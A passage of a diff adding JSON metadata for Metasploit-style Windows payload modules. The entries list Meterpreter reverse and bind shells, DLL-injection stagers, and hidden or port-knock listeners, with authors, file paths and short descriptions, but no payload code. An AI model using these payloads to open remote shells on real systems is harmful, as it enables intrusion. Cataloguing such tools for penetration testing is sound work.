Requires Windows XP SP2 or newer.\n\nConnect back to the attacker with UUID Support", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_windows/meterpreter/reverse_winhttp": { + "name": "Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp)", + "fullname": "payload/windows/meterpreter/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "Borja Merino " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_winhttp" + }, + "payload_windows/meterpreter/reverse_winhttps": { + "name": "Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp)", + "fullname": "payload/windows/meterpreter/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "Borja Merino " + ], + "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTPS (Windows winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_winhttps.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_winhttps" + }, + "payload_windows/meterpreter_bind_named_pipe": { + "name": "Windows Meterpreter Shell, Bind Named Pipe Inline", + "fullname": "payload/windows/meterpreter_bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "UserExistsError", + "sf ", + "OJ Reeves" + ], + "description": "Connect to victim and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter_bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/meterpreter_bind_tcp": { + "name": "Windows Meterpreter Shell, Bind TCP Inline", + "fullname": "payload/windows/meterpreter_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "OJ Reeves", + "sf " + ], + "description": "Connect to victim and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/meterpreter_bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/meterpreter_reverse_http": { + "name": "Windows Meterpreter Shell, Reverse HTTP Inline", + "fullname": "payload/windows/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "OJ Reeves", + "sf " + ], + "description": "Connect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/meterpreter_reverse_https": { + "name": "Windows Meterpreter Shell, Reverse HTTPS Inline", + "fullname": "payload/windows/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "OJ Reeves", + "sf " + ], + "description": "Connect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/meterpreter_reverse_ipv6_tcp": { + "name": "Windows Meterpreter Shell, Reverse TCP Inline (IPv6)", + "fullname": "payload/windows/meterpreter_reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "OJ Reeves", + "sf " + ], + "description": "Connect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter_reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/meterpreter_reverse_tcp": { + "name": "Windows Meterpreter Shell, Reverse TCP Inline", + "fullname": "payload/windows/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "OJ Reeves", + "sf " + ], + "description": "Connect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/metsvc_bind_tcp": { + "name": "Windows Meterpreter Service, Bind TCP", + "fullname": "payload/windows/metsvc_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Stub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/metsvc_bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/metsvc_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/metsvc_reverse_tcp": { + "name": "Windows Meterpreter Service, Reverse TCP Inline", + "fullname": "payload/windows/metsvc_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Stub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + 
"autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/metsvc_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/metsvc_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/patchupdllinject/bind_hidden_ipknock_tcp": { + "name": "Windows Inject DLL, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/windows/patchupdllinject/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "sf ", + "Borja Merino " + ], + "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. 
The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_windows/patchupdllinject/bind_hidden_tcp": { + "name": "Windows Inject DLL, Hidden Bind TCP Stager", + "fullname": "payload/windows/patchupdllinject/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "sf ", + "Borja Merino " + ], + "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": 
"windows/bind_hidden_tcp" + }, + "payload_windows/patchupdllinject/bind_ipv6_tcp": { + "name": "Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/windows/patchupdllinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "sf " + ], + "description": "Inject a custom DLL into the exploited process.\n\nListen for an IPv6 connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_windows/patchupdllinject/bind_ipv6_tcp_uuid": { + "name": "Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/patchupdllinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "sf ", + "OJ Reeves" + ], + "description": "Inject a custom DLL into the exploited process.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + 
"default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_windows/patchupdllinject/bind_named_pipe": { + "name": "Windows Inject DLL, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/windows/patchupdllinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "UserExistsError" + ], + "description": "Inject a custom DLL into the exploited process.\n\nListen for a pipe connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_windows/patchupdllinject/bind_nonx_tcp": { + "name": "Windows Inject DLL, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/windows/patchupdllinject/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "vlad902 " + ], + "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection (No NX)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", + 
"is_install_path": true, + "ref_name": "windows/patchupdllinject/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_windows/patchupdllinject/bind_tcp": { + "name": "Windows Inject DLL, Bind TCP Stager (Windows x86)", + "fullname": "payload/windows/patchupdllinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "sf " + ], + "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_tcp" + }, + "payload_windows/patchupdllinject/bind_tcp_rc4": { + "name": "Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/patchupdllinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + 
"mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_windows/patchupdllinject/bind_tcp_uuid": { + "name": "Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/patchupdllinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "OJ Reeves" + ], + "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_windows/patchupdllinject/find_tag": { + "name": "Windows Inject DLL, Find Tag Ordinal Stager", + "fullname": "payload/windows/patchupdllinject/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape " + ], + "description": "Inject a custom DLL into the exploited process.\n\nUse an established connection", + "references": [], + "platform": "Windows", + "arch": "x86", + 
"rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/findtag_ord.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/findtag_ord" + }, + "payload_windows/patchupdllinject/reverse_ipv6_tcp": { + "name": "Windows Inject DLL, Reverse TCP Stager (IPv6)", + "fullname": "payload/windows/patchupdllinject/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "sf " + ], + "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker over IPv6", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_windows/patchupdllinject/reverse_nonx_tcp": { + "name": "Windows Inject DLL, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/windows/patchupdllinject/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "vlad902 " + ], + "description": "Inject a custom DLL into the exploited 
process.\n\nConnect back to the attacker (No NX)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_windows/patchupdllinject/reverse_ord_tcp": { + "name": "Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/windows/patchupdllinject/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "spoonm " + ], + "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_windows/patchupdllinject/reverse_tcp": { + "name": "Windows Inject DLL, Reverse TCP Stager", + "fullname": "payload/windows/patchupdllinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + 
"jt ", + "skape ", + "hdm ", + "sf " + ], + "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_tcp" + }, + "payload_windows/patchupdllinject/reverse_tcp_allports": { + "name": "Windows Inject DLL, Reverse All-Port TCP Stager", + "fullname": "payload/windows/patchupdllinject/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "sf " + ], + "description": "Inject a custom DLL into the exploited process.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_windows/patchupdllinject/reverse_tcp_dns": { + "name": "Windows Inject DLL, Reverse TCP Stager (DNS)", + 
"fullname": "payload/windows/patchupdllinject/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "sf ", + "RageLtMan" + ], + "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_windows/patchupdllinject/reverse_tcp_rc4": { + "name": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/patchupdllinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + 
"stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_windows/patchupdllinject/reverse_tcp_rc4_dns": { + "name": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/windows/patchupdllinject/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_windows/patchupdllinject/reverse_tcp_uuid": { + "name": "Windows Inject DLL, Reverse TCP Stager with UUID Support", + "fullname": "payload/windows/patchupdllinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "OJ Reeves" + ], + "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/reverse_tcp_uuid", + "check": false, + 
"post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_windows/patchupmeterpreter/bind_hidden_ipknock_tcp": { + "name": "Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager", + "fullname": "payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "sf ", + "Borja Merino " + ], + "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "x86", + 